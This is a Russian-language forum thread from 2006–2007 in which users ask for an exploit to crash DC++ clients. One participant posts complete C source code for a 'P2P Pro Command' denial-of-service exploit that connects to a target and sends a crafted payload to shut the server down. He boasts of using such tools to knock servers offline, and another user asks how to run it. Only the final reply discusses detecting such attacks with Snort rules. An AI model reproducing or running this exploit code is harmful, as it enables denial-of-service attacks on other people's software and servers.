Зависон в DC++
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
Зависон в DC++ - 2006-09-23 23:10:13.040000
|
|
|
wouper
Сообщений: 5
Оценки: 0
Присоединился: 2006-09-23 23:07:24.290000
|
Доброго времени суток.Вчера видел чела с эксплойтом,который напрочь вешает клиент dc++.Кто нить знает что это за зверь и где взять этот эксплойт?
|
|
|
RE: Зависон в DC++ - 2006-09-26 18:52:52.006666
|
|
|
*][akep
Сообщений: 144
Оценки: 0
Присоединился: 2006-08-24 17:36:15
|
Интересная тема :D Вот я нашол сплоит для P2p DC++ но он не отрубает сервак а делает что то другое что я уже непомнь, сам еще неиспытовал. А отрубал он может не хаб а сервак Сплоитом "EVILGMP" я сам им серваки отрубал от сети. Вот сплоит для ДС++: quote:
Exploit: /* P2P Pro Command DOS Exploit ———————————— Infam0us Gr0up - Securiti Research Info: infamous.2hell.com Vendor URL: http://www.digital-revolution.org/P2PPro.html */ #include <string.h> #include <winsock2.h> #include <stdio.h> #pragma comment(lib, "ws2_32.lib") char doscore[] = "\x3f\x3f\xbc\x59\x70 " "\x32\x70\x3f\xe1 " "\x2b\x5c\x3f\xa6\xeb\xa6" "\x50\x46\x2b\x5c\x3f\xa6\xeb\xa6" "\x50\x4f\x57\x4e\x45\x44\x2e\x74" "\x78\x74\x2b\x5c\x3f\xa6\xeb\xa6" "\x50\x31\x32\x33\x32\x34\x32\x2e\x6b\x62"; int main(int argc, char *argv[]) { WSADATA wsaData; WORD wVersionRequested; struct hostent *pTarget; struct sockaddr_in sock; char *target; int port,bufsize; SOCKET inetdos; if (argc < 2) { printf(" P2P Pro Command DOS Exploit \n", argv[0]); printf(" ————————————–\n", argv[0]); printf(" Infam0us Gr0up - Securiti Research\n\n", argv[0]); printf("[-]Usage: %s [target] [port]\n", argv[0]); printf("[?]Exam: %s localhost 7802\n", argv[0]); exit(1); } wVersionRequested = MAKEWORD(1, 1); if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1; target = argv[1]; port = 7802; if (argc >= 3) port = atoi(argv[2]); bufsize = 1024; if (argc >= 4) bufsize = atoi(argv[3]); inetdos = socket(AF_INET, SOCK_STREAM, 0); if(inetdos==INVALID_SOCKET) { printf("Socket ERROR \n"); exit(1); } printf(" P2P Pro Command DOS Exploit \n", argv[0]); printf(" ————————————–\r\n\n", argv[0]); printf("Resolve host… "); if ((pTarget = gethostbyname(target)) == NULL) { printf("FAILED \n", argv[0]); exit(1); } printf("[OK]\n "); memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length); sock.sin_family = AF_INET; sock.sin_port = htons((USHORT)port); printf("[+] Connecting… "); if ( (connect(inetdos, (struct sockaddr *)&sock, sizeof (sock) ))) { printf("FAILED\n"); exit(1); } printf("[OK]\n"); printf("Target listen.. \n"); printf("Sending bad procedure… "); if (send(inetdos, doscore, sizeof(doscore)-1, 0) == -1) { printf("ERROR\n"); closesocket(inetdos); exit(1); } printf("[OK]\n "); printf("[+] Server SHUTDOWNED!\n"); closesocket(inetdos); WSACleanup(); return 0; }
|
|
|
RE: Зависон в DC++ - 2006-09-29 08:38:35.433333
|
|
|
wouper
Сообщений: 5
Оценки: 0
Присоединился: 2006-09-23 23:07:24.290000
|
Да нет,тот чел может повесить конкретного юзера.Именно юзера,а не сервак.Насколько я понял делается это переполнением буфера через приватные сообщения.Терь бы найти этот сплойтик где-нить….
|
|
|
RE: Зависон в DC++ - 2007-12-05 12:52:39.746666
|
|
|
Record
Сообщений: 19
Оценки: 0
Присоединился: 2007-12-04 23:41:22.870000
|
Как устанавливать этот эксплоит который вешает сервак? обьясните пожалуйста
|
|
|
RE: Зависон в DC++ - 2007-12-06 03:13:16.280000
|
|
|
BigIron
Сообщений: 898
Оценки: 0
Присоединился: 2007-05-13 18:53:43.593333
|
ДОбавлю несколько не по теме - но подумать думаю стоит многим. Вобщем против вот таких вот и других сплоитов очень удобно использовать snort. Даже толком писать-то ничего не надо, пишем динамическое правило с содержанием сплоита в потоке - и как результат аттака успешно отражается. А в логах - видим во первых сессию, во вторых адреса айпи/мак, интерфейс!!! А вот если еще поверх и обработчик какой стоит - можно и первоцель отследить - тоесть есть возможность автоматически исследовать путь аттаковавшего - не каждый успеет вручную обрубить хвосты! А автоматом мало кто пользуется….
|
|
|
|
|